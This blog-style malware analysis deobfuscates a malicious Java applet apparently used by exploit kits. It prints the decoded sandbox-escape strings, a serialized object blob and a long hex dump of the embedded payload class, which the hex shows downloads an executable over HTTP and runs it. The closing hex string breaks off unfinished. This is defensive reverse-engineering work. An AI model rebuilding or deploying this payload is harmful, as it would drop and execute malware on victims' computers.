Malicious Java Applet Deobfuscation

On Sunday (13th January 2013), I’ve received an email from @it4sec with regards to a malicious Java applet that he had received. So I’ve decided to write about it since Java applet seems like a common thing used by ExploitKits recently.

Recon Stage

Since a .jar file is basically a sort of “container”, let’s use 7zip to look at the structure and what does it contain.

01 - Malicious Java - Jar Structure

Structure of ycegyashypda-a.lmrjcuwbkbfxm.jar

 

Structure of Package A

Structure of Package A

As we can see from the above images, there is another file, nlfokjpqhpnjflnd, on the same level of Package A. It could probably be a resource, or the actual malware itself. But let’s fire up Java Decompiler and decompile this .jar file.

Decompiled using Java Decompiler

Decompiled using Java Decompiler

Whoa, judging from the above screenshot. It seems that the JApplet is heavily obfuscated. When you launch the JVM, you specify a class to run, it is the main() of this class where your program starts. However, that’s for normal Java applications. To get a clearer picture of how JApplet works, it’s better so explain the difference between the startup differences between a Java Application, a JApplet and a Java Thread.

  • Java Application – main()
  • JApplet – init()
  • Java Thread Start – run()

From the above-mentioned information, we can see that we need to search for init() within this .jar file. So let’s do a search with Java Decompiler and you should get back the same as shown in the image below.

Search for init()

Search for init()

So 2 java class files, ruqwqctigjeifejeioao & lmrjcuwbkbfxm, contained the init() function. If we open the 2 class files, we’ll realize that the init() in ruqwqctigjeifejeioao is empty and lmrjcuwbkbfxm  is the one starting the JApplet. But as I’ve mentioned earlier, this JApplet is heavily obfuscated. So how do we proceed? One thing I’ve noticed about most Java Obfuscators is that they placed a lot junk code into it. So what I would usually do is to perform a search on the functions. For the sake of simplicity, I did a search on “uarjiavwfxhrtqiy” and I’ve only got 1 hit, that is the declaration of the function itself. So what this probably mean is that there is no calling of this function and it’s probably junk code. After you have removed the junk codes, you will effectively have a much readable obfuscated .jar file. :P

Analysis of the XOR functions

Eventually you should have something like this zip file. As I am removing the junk code, one of the class file that caught my eye is: ruqwqctigjeifejeioao.  It comprises of 3 XOR funnctions. Let’s take a look at zgdvbqcbnsyfifz function first.

1st XOR Function

1st XOR Function

As we can see from the above image, it uses the 3 functions, equjlmvrymasjuy.xedrxvjygqwynzp, khppdrajqtvx.deftwubxwijud, lbqmiajqnkzzvfegy.ebppnwqzhuinwehxnhso before assigning it to a string array, oatgwfhyasuxgrhxgup. So let’s try understand what equjlmvrymasjuy.xedrxvjygqwynzp tries to do:

public static String[] xedrxvjygqwynzp(String paramString1, String paramString2) {
        return paramString1.split(paramString2);
}

As we can see, xedrxvjygqwynzp is basically doing a string split on paramString1 based on delimiter, paramString2. Let’s just rename the function and the variables and you should have something similar like this:

public static String[] StringSplit(String szInputString, String szDelimiter) {
        return szInputString.split(szDelimiter);
}

Now let’s move on to khppdrajqtvx.deftwubxwijud:

public static String deftwubxwijud(byte[] paramArrayOfByte) {
        return new String(paramArrayOfByte);
}

As we can see from the above code snippet, it’s basically doing a Byte to String. So let’s rename the function:

public static String Byte2String(byte[] paramArrayOfByte) {
        return new String(paramArrayOfByte);
}

Lastly, we will take a look at lbqmiajqnkzzvfegy.ebppnwqzhuinwehxnhso:

public static String ebppnwqzhuinwehxnhso() {
        return rlfcwveaurpxojwdymq.agzcxgdeagqpu();
}

Oh great, it’s calling another function in another class. Let’s take a look at rlfcwveaurpxojwdymq.agzcxgdeagqpu before going back to this again:

public static String agzcxgdeagqpu() {
        char[] arrayOfChar = new char[2];

        arrayOfChar[0] = '\\';
        arrayOfChar[1] = ';';

        return new String(arrayOfChar);
}

So this is just returning a String array comprising of ‘\’ and ‘;’. Let’s rename this function, agzcxgdeagqpu , as:

public static String szReturningBackSlashAndSemiColon(){
    char[] arrayOfChar = new char[2];

    arrayOfChar[0] = '\\';
    arrayOfChar[1] = ';';

    return new String(arrayOfChar);
}

And rename ebppnwqzhuinwehxnhso as follows:

public static String szReturningBackSlashAndSemiColonFromAnotherClass(){
        return rlfcwveaurpxojwdymq.szReturningBackSlashAndSemiColon();
}

Now after renaming all the functions, let’s take a 2nd look at zgdvbqcbnsyfifz again:

oatgwfhyasuxgrhxgup = equjlmvrymasjuy.xedrxvjygqwynzp(khppdrajqtvx.deftwubxwijud(arrayOfByte1),
lbqmiajqnkzzvfegy.
ebppnwqzhuinwehxnhso());

is giving us a deobfuscated string:

szDeObfuscatedString = StringSplit(Byte2String(arrayOfByte1), szReturningBackSlashAndSemiColonFromAnotherClass());

If we were to write a Java file with the analyzed XOR function in it, we would be getting the following String array.

stringArray[0] = "java.security.AllPermission";
stringArray[1] = "file://";
stringArray[2] = "a.Time
stringArray[3] = "getDeclaredConstructors";
stringArray[4] = "newInstance";
stringArray[5] = "go";
stringArray[6] = "ycegyashypda";
stringArray[7] = "/nlfokjpqhpnjflnd";
stringArray[8] = "java.util.concurrent.atomic.AtomicReferenceArray";
stringArray[9] = "set";
stringArray[10] = "setSecurityManager";
stringArray[11] = "forName";
stringArray[12] = "sun.awt.SunToolkit";
stringArray[13] = "getField";
stringArray[14] = "acc";
stringArray[15] = "com.sun.org.glassfish.gmbal.util.GenericConstructor";
stringArray[16] = "com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory";
stringArray[17] = "sun.invoke.anon.AnonymousClassLoader";
stringArray[18] = "loadClass";

Check that number 7 contains the string that is the filename of the file which is on the same level of Package A. We’ll come back to this later on, now let’s take a look at the 2nd XOR functions.

2nd XOR Function

2nd XOR Function

If we were to write a Java file and place this XOR function in it, we would be getting the following Byte array:

array[] = { AC, ED, 00, 05, 75, 72, 00, 13, 5B, 4C, 6A, 61, 76, 
61, 2E, 6C, 61, 6E, 67, 2E, 4F, 62, 6A, 65, 63, 74, 3B, 90, CE, 
58, 9F, 10, 73, 29, 6C, 02, 00, 00, 78, 70, 00, 00, 00, 02, 75, 
72, 00, 09, 5B, 4C, 61, 2E, 68, 6B, 7A, 6E, 3B, FE, 2C, 94, 11, 
88, B6, E5, FF, 02, 00, 00, 78, 70, 00, 00, 00, 01, 70, 73, 72, 
00, 30, 6A, 61, 76, 61, 2E, 75, 74, 69, 6C, 2E, 63, 6F, 6E, 63, 
75, 72, 72, 65, 6E, 74, 2E, 61, 74, 6F, 6D, 69, 63, 2E, 41, 74, 
6F, 6D, 69, 63, 52, 65, 66, 65, 72, 65, 6E, 63, 65, 41, 72, 72, 
61, 79, A9, D2, DE, A1, BE, 65, 60, 0C, 02, 00, 01, 5B, 00, 05, 
61, 72, 72, 61, 79, 74, 00, 13, 5B, 4C, 6A, 61, 76, 61, 2F, 6C, 
61, 6E, 67, 2F, 4F, 62, 6A, 65, 63, 74, 3B, 78, 70, 71, 00, 7E, 
00, 03 };

If you are familiar with file headers, you will realize that ACED means that this is a “Java serialization data” and this byte array is being used in the “init” function. Now let’s move on to the 3rd XOR function.

3rd XOR Function

3rd XOR Function

If we were to write a Java file and place this XOR function in it, we would be getting the following Byte array:

array[] = { CA, FE, BA, BE, 00, 00, 00, 31, 00, BE, 0A, 00, 40,
00, 56, 08, 00, 57, 09, 00, 3F, 00, 58, 08, 00, 59, 09, 00, 3F,
00, 5A, 08, 00, 5B, 09, 00, 3F, 00, 5C, 08, 00, 5D, 09, 00, 3F,
00, 5E, 09, 00, 3F, 00, 5F, 0A, 00, 60, 00, 61, 07, 00, 62, 0A,
00, 0C, 00, 63, 0A, 00, 64, 00, 65, 08, 00, 66, 0A, 00, 64, 00,
67, 08, 00, 68, 0A, 00, 1F, 00, 69, 08, 00, 6A, 07, 00, 6B, 0A,
00, 14, 00, 56, 0A, 00, 14, 00, 6C, 08, 00, 6D, 0A, 00, 14, 00,
6E, 0A, 00, 28, 00, 6F, 0A, 00, 3F, 00, 70, 08, 00, 71, 0A, 00,
3F, 00, 72, 07, 00, 73, 0A, 00, 74, 00, 75, 07, 00, 76, 0A, 00,
74, 00, 77, 07, 00, 78, 0A, 00, 21, 00, 79, 0A, 00, 21, 00, 7A,
0A, 00, 7B, 00, 7C, 0A, 00, 7B, 00, 7D, 07, 00, 7E, 0A, 00, 26,
00, 63, 07, 00, 7F, 0A, 00, 28, 00, 80, 0A, 00, 28, 00, 6E, 07,
00, 81, 0A, 00, 2B, 00, 82, 07, 00, 83, 0A, 00, 2D, 00, 56, 0A,
00, 2B, 00, 84, 0A, 00, 2D, 00, 85, 0A, 00, 2D, 00, 86, 0A, 00,
1D, 00, 87, 07, 00, 88, 0A, 00, 33, 00, 79, 0A, 00, 89, 00, 8A,
0A, 00, 89, 00, 7D, 0A, 00, 28, 00, 8B, 07, 00, 8C, 0A, 00, 38,
00, 56, 07, 00, 8D, 0A, 00, 3A, 00, 56, 0A, 00, 38, 00, 8E, 0A,
00, 3A, 00, 8F, 0A, 00, 3A, 00, 6E, 07, 00, 90, 07, 00, 91, 07,
00, 92, 01, 00, 03, 75, 72, 6C, 01, 00, 12, 4C, 6A, 61, 76, 61,
2F, 6C, 61, 6E, 67, 2F, 53, 74, 72, 69, 6E, 67, 3B, 01, 00, 08,
68, 74, 74, 70, 5F, 70, 72, 65, 01, 00, 0A, 68, 74, 74, 70, 5F,
6F, 75, 74, 72, 6F, 01, 00, 08, 68, 74, 74, 70, 5F, 64, 6F, 74,
01, 00, 07, 70, 61, 79, 6C, 6F, 61, 64, 01, 00, 02, 5B, 42, 01,
00, 06, 3C, 69, 6E, 69, 74, 3E, 01, 00, 03, 28, 29, 56, 01, 00,
04, 43, 6F, 64, 65, 01, 00, 02, 67, 6F, 01, 00, 17, 28, 5B, 42,
4C, 6A, 61, 76, 61, 2F, 6C, 61, 6E, 67, 2F, 53, 74, 72, 69, 6E,
67, 3B, 29, 56, 01, 00, 03, 72, 75, 6E, 01, 00, 14, 28, 29, 4C,
6A, 61, 76, 61, 2F, 6C, 61, 6E, 67, 2F, 4F, 62, 6A, 65, 63, 74,
3B, 01, 00, 0A, 45, 78, 63, 65, 70, 74, 69, 6F, 6E, 73, 01, 00,
02, 73, 66, 01, 00, 17, 28, 4C, 6A, 61, 76, 61, 2F, 6C, 61, 6E,
67, 2F, 53, 74, 72, 69, 6E, 67, 3B, 5B, 42, 29, 56, 07, 00, 93,
01, 00, 03, 72, 6E, 6D, 01, 00, 27, 28, 4C, 6A, 61, 76, 61, 2F,
6C, 61, 6E, 67, 2F, 49, 6E, 74, 65, 67, 65, 72, 3B, 29, 4C, 6A,
61, 76, 61, 2F, 6C, 61, 6E, 67, 2F, 53, 74, 72, 69, 6E, 67, 3B,
0C, 00, 49, 00, 4A, 01, 00, 09, 31, 32, 37, 2E, 30, 2E, 30, 2E,
31, 0C, 00, 42, 00, 43, 01, 00, 07, 68, 74, 74, 70, 3A, 2F, 2F,
0C, 00, 44, 00, 43, 01, 00, 08, 2F, 6D, 65, 73, 74, 61, 74, 73,
0C, 00, 45, 00, 43, 01, 00, 01, 2E, 0C, 00, 46, 00, 43, 0C, 00,
47, 00, 48, 07, 00, 94, 0C, 00, 95, 00, 96, 01, 00, 13, 6A, 61,
76, 61, 2F, 6C, 61, 6E, 67, 2F, 54, 68, 72, 6F, 77, 61, 62, 6C,
65, 0C, 00, 97, 00, 4A, 07, 00, 98, 0C, 00, 99, 00, 9A, 01, 00,
0E, 6A, 61, 76, 61, 2E, 69, 6F, 2E, 74, 6D, 70, 64, 69, 72, 0C,
00, 9B, 00, 9C, 01, 00, 01, 2F, 0C, 00, 9D, 00, 9E, 01, 00, 01,
5C, 01, 00, 17, 6A, 61, 76, 61, 2F, 6C, 61, 6E, 67, 2F, 53, 74,
72, 69, 6E, 67, 42, 75, 69, 6C, 64, 65, 72, 0C, 00, 9F, 00, A0,
01, 00, 0E, 66, 69, 6C, 65, 2E, 73, 65, 70, 61, 72, 61, 74, 6F,
72, 0C, 00, A1, 00, A2, 0C, 00, A3, 00, A4, 0C, 00, 54, 00, 55,
01, 00, 04, 2E, 65, 78, 65, 0C, 00, 51, 00, 52, 01, 00, 11, 6A,
61, 76, 61, 2F, 6C, 61, 6E, 67, 2F, 50, 72, 6F, 63, 65, 73, 73,
07, 00, A5, 0C, 00, A6, 00, A7, 01, 00, 10, 6A, 61, 76, 61, 2F,
6C, 61, 6E, 67, 2F, 53, 74, 72, 69, 6E, 67, 0C, 00, A8, 00, A9,
01, 00, 0C, 6A, 61, 76, 61, 2F, 6E, 65, 74, 2F, 55, 52, 4C, 0C,
00, 49, 00, AA, 0C, 00, AB, 00, AC, 07, 00, AD, 0C, 00, AE, 00,
AF, 0C, 00, B0, 00, 4A, 01, 00, 13, 6A, 61, 76, 61, 2F, 6C, 61,
6E, 67, 2F, 45, 78, 63, 65, 70, 74, 69, 6F, 6E, 01, 00, 11, 6A,
61, 76, 61, 2F, 6C, 61, 6E, 67, 2F, 49, 6E, 74, 65, 67, 65, 72,
0C, 00, 49, 00, B1, 01, 00, 1B, 6A, 61, 76, 61, 2F, 69, 6F, 2F,
42, 75, 66, 66, 65, 72, 65, 64, 49, 6E, 70, 75, 74, 53, 74, 72,
65, 61, 6D, 0C, 00, 49, 00, B2, 01, 00, 1D, 6A, 61, 76, 61, 2F,
69, 6F, 2F, 42, 79, 74, 65, 41, 72, 72, 61, 79, 4F, 75, 74, 70,
75, 74, 53, 74, 72, 65, 61, 6D, 0C, 00, AE, 00, B3, 0C, 00, B4,
00, B5, 0C, 00, B6, 00, B7, 0C, 00, B8, 00, AF, 01, 00, 18, 6A,
61, 76, 61, 2F, 69, 6F, 2F, 46, 69, 6C, 65, 4F, 75, 74, 70, 75,
74, 53, 74, 72, 65, 61, 6D, 07, 00, B9, 0C, 00, B4, 00, BA, 0C,
00, BB, 00, AF, 01, 00, 10, 6A, 61, 76, 61, 2F, 75, 74, 69, 6C,
2F, 52, 61, 6E, 64, 6F, 6D, 01, 00, 16, 6A, 61, 76, 61, 2F, 6C,
61, 6E, 67, 2F, 53, 74, 72, 69, 6E, 67, 42, 75, 66, 66, 65, 72,
0C, 00, BC, 00, BA, 0C, 00, 9F, 00, BD, 01, 00, 06, 61, 2F, 54,
69, 6D, 65, 01, 00, 10, 6A, 61, 76, 61, 2F, 6C, 61, 6E, 67, 2F,
4F, 62, 6A, 65, 63, 74, 01, 00, 27, 6A, 61, 76, 61, 2F, 73, 65,
63, 75, 72, 69, 74, 79, 2F, 50, 72, 69, 76, 69, 6C, 65, 67, 65,
64, 45, 78, 63, 65, 70, 74, 69, 6F, 6E, 41, 63, 74, 69, 6F, 6E,
01, 00, 13, 6A, 61, 76, 61, 2F, 69, 6F, 2F, 49, 4F, 45, 78, 63,
65, 70, 74, 69, 6F, 6E, 01, 00, 1E, 6A, 61, 76, 61, 2F, 73, 65,
63, 75, 72, 69, 74, 79, 2F, 41, 63, 63, 65, 73, 73, 43, 6F, 6E,
74, 72, 6F, 6C, 6C, 65, 72, 01, 00, 0C, 64, 6F, 50, 72, 69, 76,
69, 6C, 65, 67, 65, 64, 01, 00, 3D, 28, 4C, 6A, 61, 76, 61, 2F,
73, 65, 63, 75, 72, 69, 74, 79, 2F, 50, 72, 69, 76, 69, 6C, 65,
67, 65, 64, 45, 78, 63, 65, 70, 74, 69, 6F, 6E, 41, 63, 74, 69,
6F, 6E, 3B, 29, 4C, 6A, 61, 76, 61, 2F, 6C, 61, 6E, 67, 2F, 4F,
62, 6A, 65, 63, 74, 3B, 01, 00, 0F, 70, 72, 69, 6E, 74, 53, 74,
61, 63, 6B, 54, 72, 61, 63, 65, 01, 00, 10, 6A, 61, 76, 61, 2F,
6C, 61, 6E, 67, 2F, 53, 79, 73, 74, 65, 6D, 01, 00, 12, 73, 65,
74, 53, 65, 63, 75, 72, 69, 74, 79, 4D, 61, 6E, 61, 67, 65, 72,
01, 00, 1E, 28, 4C, 6A, 61, 76, 61, 2F, 6C, 61, 6E, 67, 2F, 53,
65, 63, 75, 72, 69, 74, 79, 4D, 61, 6E, 61, 67, 65, 72, 3B, 29,
56, 01, 00, 0B, 67, 65, 74, 50, 72, 6F, 70, 65, 72, 74, 79, 01,
00, 26, 28, 4C, 6A, 61, 76, 61, 2F, 6C, 61, 6E, 67, 2F, 53, 74,
72, 69, 6E, 67, 3B, 29, 4C, 6A, 61, 76, 61, 2F, 6C, 61, 6E, 67,
2F, 53, 74, 72, 69, 6E, 67, 3B, 01, 00, 08, 65, 6E, 64, 73, 57,
69, 74, 68, 01, 00, 15, 28, 4C, 6A, 61, 76, 61, 2F, 6C, 61, 6E,
67, 2F, 53, 74, 72, 69, 6E, 67, 3B, 29, 5A, 01, 00, 06, 61, 70,
70, 65, 6E, 64, 01, 00, 2D, 28, 4C, 6A, 61, 76, 61, 2F, 6C, 61,
6E, 67, 2F, 53, 74, 72, 69, 6E, 67, 3B, 29, 4C, 6A, 61, 76, 61,
2F, 6C, 61, 6E, 67, 2F, 53, 74, 72, 69, 6E, 67, 42, 75, 69, 6C,
64, 65, 72, 3B, 01, 00, 08, 74, 6F, 53, 74, 72, 69, 6E, 67, 01,
00, 14, 28, 29, 4C, 6A, 61, 76, 61, 2F, 6C, 61, 6E, 67, 2F, 53,
74, 72, 69, 6E, 67, 3B, 01, 00, 07, 76, 61, 6C, 75, 65, 4F, 66,
01, 00, 16, 28, 49, 29, 4C, 6A, 61, 76, 61, 2F, 6C, 61, 6E, 67,
2F, 49, 6E, 74, 65, 67, 65, 72, 3B, 01, 00, 11, 6A, 61, 76, 61,
2F, 6C, 61, 6E, 67, 2F, 52, 75, 6E, 74, 69, 6D, 65, 01, 00, 0A,
67, 65, 74, 52, 75, 6E, 74, 69, 6D, 65, 01, 00, 15, 28, 29, 4C,
6A, 61, 76, 61, 2F, 6C, 61, 6E, 67, 2F, 52, 75, 6E, 74, 69, 6D,
65, 3B, 01, 00, 04, 65, 78, 65, 63, 01, 00, 28, 28, 5B, 4C, 6A,
61, 76, 61, 2F, 6C, 61, 6E, 67, 2F, 53, 74, 72, 69, 6E, 67, 3B,
29, 4C, 6A, 61, 76, 61, 2F, 6C, 61, 6E, 67, 2F, 50, 72, 6F, 63,
65, 73, 73, 3B, 01, 00, 15, 28, 4C, 6A, 61, 76, 61, 2F, 6C, 61,
6E, 67, 2F, 53, 74, 72, 69, 6E, 67, 3B, 29, 56, 01, 00, 0A, 6F,
70, 65, 6E, 53, 74, 72, 65, 61, 6D, 01, 00, 17, 28, 29, 4C, 6A,
61, 76, 61, 2F, 69, 6F, 2F, 49, 6E, 70, 75, 74, 53, 74, 72, 65,
61, 6D, 3B, 01, 00, 13, 6A, 61, 76, 61, 2F, 69, 6F, 2F, 49, 6E,
70, 75, 74, 53, 74, 72, 65, 61, 6D, 01, 00, 04, 72, 65, 61, 64,
01, 00, 03, 28, 29, 49, 01, 00, 05, 63, 6C, 6F, 73, 65, 01, 00,
04, 28, 49, 29, 56, 01, 00, 18, 28, 4C, 6A, 61, 76, 61, 2F, 69,
6F, 2F, 49, 6E, 70, 75, 74, 53, 74, 72, 65, 61, 6D, 3B, 29, 56,
01, 00, 07, 28, 5B, 42, 49, 49, 29, 49, 01, 00, 05, 77, 72, 69,
74, 65, 01, 00, 07, 28, 5B, 42, 49, 49, 29, 56, 01, 00, 0B, 74,
6F, 42, 79, 74, 65, 41, 72, 72, 61, 79, 01, 00, 04, 28, 29, 5B,
42, 01, 00, 07, 77, 61, 69, 74, 46, 6F, 72, 01, 00, 14, 6A, 61,
76, 61, 2F, 69, 6F, 2F, 4F, 75, 74, 70, 75, 74, 53, 74, 72, 65,
61, 6D, 01, 00, 05, 28, 5B, 42, 29, 56, 01, 00, 08, 69, 6E, 74,
56, 61, 6C, 75, 65, 01, 00, 09, 6E, 65, 78, 74, 42, 79, 74, 65,
73, 01, 00, 1B, 28, 43, 29, 4C, 6A, 61, 76, 61, 2F, 6C, 61, 6E,
67, 2F, 53, 74, 72, 69, 6E, 67, 42, 75, 66, 66, 65, 72, 3B, 00,
21, 00, 3F, 00, 40, 00, 01, 00, 41, 00, 05, 00, 01, 00, 42, 00,
43, 00, 00, 00, 01, 00, 44, 00, 43, 00, 00, 00, 01, 00, 45, 00,
43, 00, 00, 00, 01, 00, 46, 00, 43, 00, 00, 00, 01, 00, 47, 00,
48, 00, 00, 00, 05, 00, 01, 00, 49, 00, 4A, 00, 01, 00, 4B, 00,
00, 00, 43, 00, 02, 00, 02, 00, 00, 00, 2F, 2A, B7, 00, 01, 2A,
12, 02, B5, 00, 03, 2A, 12, 04, B5, 00, 05, 2A, 12, 06, B5, 00,
07, 2A, 12, 08, B5, 00, 09, 2A, 01, B5, 00, 0A, 2A, B8, 00, 0B,
4C, A7, 00, 08, 4C, 2B, B6, 00, 0D, B1, 00, 01, 00, 21, 00, 26,
00, 29, 00, 0C, 00, 00, 00, 01, 00, 4C, 00, 4D, 00, 01, 00, 4B,
00, 00, 00, 2C, 00, 02, 00, 04, 00, 00, 00, 18, 2A, 2C, B5, 00,
03, 2A, 2B, B5, 00, 0A, 2A, B8, 00, 0B, 4E, A7, 00, 08, 4E, 2D,
B6, 00, 0D, B1, 00, 01, 00, 0A, 00, 0F, 00, 12, 00, 0C, 00, 00,
00, 01, 00, 4E, 00, 4F, 00, 02, 00, 4B, 00, 00, 03, 10, 00, 07,
00, 13, 00, 00, 02, DC, 01, B8, 00, 0E, 2A, B4, 00, 0A, C7, 00,
05, 01, B0, 12, 0F, B8, 00, 10, 4C, 2B, 12, 11, B6, 00, 12, 9A,
00, 23, 2B, 12, 13, B6, 00, 12, 9A, 00, 1A, BB, 00, 14, 59, B7,
00, 15, 2B, B6, 00, 16, 12, 17, B8, 00, 10, B6, 00, 16, B6, 00,
18, 4C, BB, 00, 14, 59, B7, 00, 15, 10, 08, B8, 00, 19, B8, 00,
1A, B6, 00, 16, 12, 1B, B6, 00, 16, B6, 00, 18, 4D, BB, 00, 14,
59, B7, 00, 15, 2B, B6, 00, 16, 2C, B6, 00, 16, B6, 00, 18, 4E,
08, BC, 08, 59, 03, 10, C9, 54, 59, 04, 10, CB, 54, 59, 05, 10,
C3, 54, 59, 06, 10, A2, 54, 59, 07, 10, 91, 54, 3A, 04, 03, 36,
05, 03, 36, 06, 15, 06, 2A, B4, 00, 0A, BE, A2, 00, 2C, 15, 05,
19, 04, BE, A1, 00, 06, 03, 36, 05, 2A, B4, 00, 0A, 15, 06, 2A,
B4, 00, 0A, 15, 06, 33, 19, 04, 15, 05, 33, 82, 91, 54, 84, 05,
01, 84, 06, 01, A7, FF, D0, 2A, 2D, 2A, B4, 00, 0A, B7, 00, 1C,
10, 0C, BD, 00, 1D, 3A, 06, 03, 36, 07, 15, 07, 19, 06, BE, A2,
00, 0F, 19, 06, 15, 07, 01, 53, 84, 07, 01, A7, FF, EF, 03, 36,
07, 19, 06, 15, 07, B8, 00, 1E, 04, BD, 00, 1F, 59, 03, 2D, 53,
B6, 00, 20, 53, 84, 07, 01, BB, 00, 21, 59, 2A, B4, 00, 03, B7,
00, 22, 3A, 08, 19, 08, B6, 00, 23, 3A, 09, 19, 09, B6, 00, 24,
57, 19, 09, B6, 00, 25, A7, 00, 0A, 3A, 08, 19, 08, B6, 00, 27,
07, BC, 0A, 3A, 08, 19, 08, 03, 11, 00, C0, 4F, 19, 08, 04, 11,
00, A6, 4F, 19, 08, 05, 11, 00, DA, 4F, 19, 08, 06, 11, 00, B7,
4F, BB, 00, 14, 59, B7, 00, 15, 2A, B4, 00, 05, B6, 00, 16, BB,
00, 28, 59, 19, 08, 03, 2E, B7, 00, 29, B6, 00, 2A, B6, 00, 16,
2A, B4, 00, 09, B6, 00, 16, BB, 00, 28, 59, 19, 08, 04, 2E, B7,
00, 29, B6, 00, 2A, B6, 00, 16, 2A, B4, 00, 09, B6, 00, 16, BB,
00, 28, 59, 19, 08, 05, 2E, B7, 00, 29, B6, 00, 2A, B6, 00, 16,
2A, B4, 00, 09, B6, 00, 16, BB, 00, 28, 59, 19, 08, 06, 2E, B7,
00, 29, B6, 00, 2A, B6, 00, 16, 2A, B4, 00, 07, B6, 00, 16, B6,
00, 18, 3A, 09, BB, 00, 2B, 59, BB, 00, 21, 59, 19, 09, B7, 00,
22, B6, 00, 23, B7, 00, 2C, 3A, 0A, BB, 00, 2D, 59, B7, 00, 2E,
3A, 0B, 11, 30, 00, BC, 08, 3A, 0C, 19, 0A, 19, 0C, 03, 19, 0C,
BE, B6, 00, 2F, 59, 36, 0D, 02, 9F, 00, 10, 19, 0B, 19, 0C, 03,
15, 0D, B6, 00, 30, A7, FF, E4, 19, 0B, B6, 00, 31, 3A, 0E, 19,
0E, BE, 11, 20, 00, A4, 00, 53, BB, 00, 14, 59, B7, 00, 15, 10,
07, B8, 00, 19, B8, 00, 1A, B6, 00, 16, 12, 1B, B6, 00, 16, B6,
00, 18, 3A, 0F, BB, 00, 14, 59, B7, 00, 15, 2B, B6, 00, 16, 19,
0F, B6, 00, 16, B6, 00, 18, 3A, 10, 2A, 19, 10, 19, 0E, B7, 00,
1C, 19, 06, 15, 07, B8, 00, 1E, 04, BD, 00, 1F, 59, 03, 19, 10,
53, B6, 00, 20, 53, 84, 07, 01, 03, 36, 08, 15, 08, 19, 06, BE,
A2, 00, 1A, 19, 06, 15, 08, 32, C6, 00, 0C, 19, 06, 15, 08, 32,
B6, 00, 32, 57, 84, 08, 01, A7, FF, E4, A7, 00, 56, 3A, 08, 19,
08, B6, 00, 27, 03, 36, 08, 15, 08, 19, 06, BE, A2, 00, 1A, 19,
06, 15, 08, 32, C6, 00, 0C, 19, 06, 15, 08, 32, B6, 00, 32, 57,
84, 08, 01, A7, FF, E4, A7, 00, 2A, 3A, 11, 03, 36, 12, 15, 12,
19, 06, BE, A2, 00, 1A, 19, 06, 15, 12, 32, C6, 00, 0C, 19, 06,
15, 12, 32, B6, 00, 32, 57, 84, 12, 01, A7, FF, E4, 19, 11, BF,
01, B0, 00, 05, 01, 01, 01, 20, 01, 23, 00, 26, 01, 2A, 02, 62,
02, 87, 00, 26, 01, 2A, 02, 62, 02, B3, 00, 00, 02, 87, 02, 8E,
02, B3, 00, 00, 02, B3, 02, B5, 02, B3, 00, 00, 00, 00, 00, 50,
00, 00, 00, 04, 00, 01, 00, 26, 00, 02, 00, 51, 00, 52, 00, 02,
00, 4B, 00, 00, 00, 1F, 00, 03, 00, 04, 00, 00, 00, 13, BB, 00,
33, 59, 2B, B7, 00, 34, 4E, 2D, 2C, B6, 00, 35, 2D, B6, 00, 36,
B1, 00, 00, 00, 00, 00, 50, 00, 00, 00, 04, 00, 01, 00, 53, 00,
09, 00, 54, 00, 55, 00, 01, 00, 4B, 00, 00, 00, 9A, 00, 04, 00,
07, 00, 00, 00, 8E, 2A, B6, 00, 37, BC, 08, 4C, BB, 00, 38, 59,
B7, 00, 39, 4D, BB, 00, 3A, 59, B7, 00, 3B, 4E, 2C, 2B, B6, 00,
3C, 03, 36, 04, 15, 04, 2B, BE, A2, 00, 66, 2B, 15, 04, 33, 11,
00, F0, 7E, 07, 7A, 91, 36, 05, 2B, 15, 04, 33, 10, 0F, 7E, 91,
36, 06, 15, 05, 10, 0A, A2, 00, 11, 2D, 10, 30, 15, 05, 60, 92,
B6, 00, 3D, 57, A7, 00, 11, 2D, 10, 41, 15, 05, 10, 0A, 64, 60,
92, B6, 00, 3D, 57, 15, 06, 10, 0A, A2, 00, 11, 2D, 10, 30, 15,
06, 60, 92, B6, 00, 3D, 57, A7, 00, 11, 2D, 10, 41, 15, 06, 10,
0A, 64, 60, 92, B6, 00, 3D, 57, 84, 04, 01, A7, FF, 99, 2D, B6,
00, 3E, B0, 00, 00, 00, 00, 00, 00 };

Immediately again, if you are familiar with file headers. You will realize that CA FE BA BE is the header Java bytecode file (.class).

Rebuilding the .class file

So let’s extract these bytes and write them to a file like this:

CAFEBABE0000003100BE0A0040005608005709003F005808005909003F005A0
8005B09003F005C08005D09003F005E09003F005F0A006000610700620A000C
00630A006400650800660A006400670800680A001F006908006A07006B0A001
400560A0014006C08006D0A0014006E0A0028006F0A003F00700800710A003F
00720700730A007400750700760A007400770700780A002100790A0021007A0
A007B007C0A007B007D07007E0A0026006307007F0A002800800A0028006E07
00810A002B00820700830A002D00560A002B00840A002D00850A002D00860A0
01D00870700880A003300790A0089008A0A0089007D0A0028008B07008C0A00
38005607008D0A003A00560A0038008E0A003A008F0A003A006E07009007009
107009201000375726C0100124C6A6176612F6C616E672F537472696E673B01
0008687474705F70726501000A687474705F6F7574726F010008687474705F6
46F740100077061796C6F61640100025B420100063C696E69743E0100032829
56010004436F6465010002676F010017285B424C6A6176612F6C616E672F537
472696E673B295601000372756E01001428294C6A6176612F6C616E672F4F62
6A6563743B01000A457863657074696F6E730100027366010017284C6A61766
12F6C616E672F537472696E673B5B422956070093010003726E6D010027284C
6A6176612F6C616E672F496E74656765723B294C6A6176612F6C616E672F537
472696E673B0C0049004A0100093132372E302E302E310C0042004301000768
7474703A2F2F0C004400430100082F6D6573746174730C004500430100012E0
C004600430C004700480700940C009500960100136A6176612F6C616E672F54
68726F7761626C650C0097004A0700980C0099009A01000E6A6176612E696F2
E746D706469720C009B009C0100012F0C009D009E0100015C0100176A617661
2F6C616E672F537472696E674275696C6465720C009F00A001000E66696C652
E736570617261746F720C00A100A20C00A300A40C005400550100042E657865
0C005100520100116A6176612F6C616E672F50726F636573730700A50C00A60
0A70100106A6176612F6C616E672F537472696E670C00A800A901000C6A6176
612F6E65742F55524C0C004900AA0C00AB00AC0700AD0C00AE00AF0C00B0004
A0100136A6176612F6C616E672F457863657074696F6E0100116A6176612F6C
616E672F496E74656765720C004900B101001B6A6176612F696F2F427566666
5726564496E70757453747265616D0C004900B201001D6A6176612F696F2F42
79746541727261794F757470757453747265616D0C00AE00B30C00B400B50C0
0B600B70C00B800AF0100186A6176612F696F2F46696C654F75747075745374
7265616D0700B90C00B400BA0C00BB00AF0100106A6176612F7574696C2F526
16E646F6D0100166A6176612F6C616E672F537472696E674275666665720C00
BC00BA0C009F00BD010006612F54696D650100106A6176612F6C616E672F4F6
26A6563740100276A6176612F73656375726974792F50726976696C65676564
